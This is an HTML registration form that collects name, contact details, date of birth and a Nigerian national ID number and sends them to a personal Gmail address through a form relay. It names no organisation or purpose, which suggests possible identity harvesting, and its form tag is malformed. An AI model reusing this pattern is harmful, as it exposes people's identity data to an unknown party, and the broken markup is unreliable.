<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Registration Request Form</title>
    <style>
        body {
            font-family: Arial, sans-serif;
            margin: 0;
            padding: 20px;
        }
        .container {
            max-width: 600px;
            margin: 0 auto;
            padding: 20px;
            border: 1px solid #ccc;
            border-radius: 5px;
            background-color: #f9f9f9;
        }
        h1 {
            text-align: center;
        }
        label {
            display: block;
            margin-top: 10px;
        }
        input[type="text"],
        input[type="email"],
        input[type="date"] {
            width: calc(100% - 20px);
            padding: 8px;
            margin: 5px 0;
            border: 1px solid #ccc;
            border-radius: 5px;
        }
        .checkbox-group,
        .radio-group {
            margin: 10px 0;
        }
        .checkbox-group label,
        .radio-group label {
            display: inline-block;
            margin-right: 10px;
        }
        .declaration {
            margin-top: 20px;
        }
        .declaration input[type="text"] {
            width: 100%;
        }
        .submit-btn {
            display: block;
            width: 100%;
            padding: 10px;
            background-color: #4CAF50;
            color: white;
            border: none;
            border-radius: 5px;
            cursor: pointer;
            margin-top: 20px;
        }
        .submit-btn:hover {
            background-color: #45a049;
        }
    </style>
</head>
<body>
    <div class="container">
        <h1>Registration Request Form</h1>
        <form action="https://formsubmit.co/empirevirtual99@gmail.com" method="post"
            <h2>Personal Information</h2>
            <label for="fullName">Full Name:</label>
            <input type="text" id="fullName" name="fullName" required>

            <label for="email">Email Address:</label>
            <input type="email" id="email" name="email" required>

            <label for="phone">Phone Number:</label>
            <input type="text" id="phone" name="phone" required>

            <label for="dob">Date of Birth (YYYY-MM-DD):</label>
            <input type="date" id="dob" name="dob" required>

            <label for="country">Country:</label>
            <input type="text" id="country" name="country" value="Nigeria" readonly>

            <label for="nin">National Identification Number (NIN):</label>
            <input type="text" id="nin" name="nin" required>

            <h2>Additional Information</h2>
            <label>How did you hear about us?</label>
            <div class="checkbox-group">
                <label><input type="checkbox" name="referral" value="Friend/Family"> Friend/Family</label>
                <label><input type="checkbox" name="referral" value="Social Media"> Social Media</label>
                <label><input type="checkbox" name="referral" value="Online Advertisement"> Online Advertisement</label>
                <label><input type="checkbox" name="referral" value="Other"> Other: <input type="text" name="referralOther"></label>
            </div>

            <label>Preferred Contact Method:</label>
            <div class="radio-group">
                <label><input type="radio" name="contactMethod" value="Email" required> Email</label>
                <label><input type="radio" name="contactMethod" value="Phone" required> Phone</label>
            </div>

            <h2>Declaration</h2>
            <div class="declaration">
                <label>I hereby declare that the information provided is true and correct to the best of my knowledge.</label>
                <label for="date">Date:</label>
                <input type="date" id="date" name="date" required>
            </div>

            <button type="submit" class="submit-btn">Submit</button>
        </form>